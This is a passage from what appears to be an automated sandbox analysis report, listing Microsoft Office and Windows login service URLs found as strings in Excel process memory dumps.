      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechQ
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: EXCEL.EXE, 00000000.00000002.584874541.0000000012D80000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android;
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://globaldisco.crm.dynamics.como
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.netw5i
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://graph.windows.net
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://graph.windows.net/
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/e
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000002.584928062.0000000012DB8000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?#/?
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: EXCEL.EXE, 00000000.00000002.584874541.0000000012D80000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1kO
      Source: EXCEL.EXE, 00000000.00000003.502326772.000000000DEE3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.308708067.000000000DEE3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.583734365.000000000DEE3000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.comFU
      Source: EXCEL.EXE, 00000000.00000002.584874541.0000000012D80000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bings/
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: EXCEL.EXE, 00000000.00000002.584874541.0000000012D80000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtE
      Source: EXCEL.EXE, 00000000.00000002.584874541.0000000012D80000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: EXCEL.EXE, 00000000.00000002.584874541.0000000012D80000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://lifecycle.office.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comW
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize_P
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizez-
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://login.windows.local
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.localtes
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize&
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize#G
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize%
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize%M
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize&
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize&J
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize((:
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize/
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize0KR
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize1HQ
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize3FW
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6M
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8
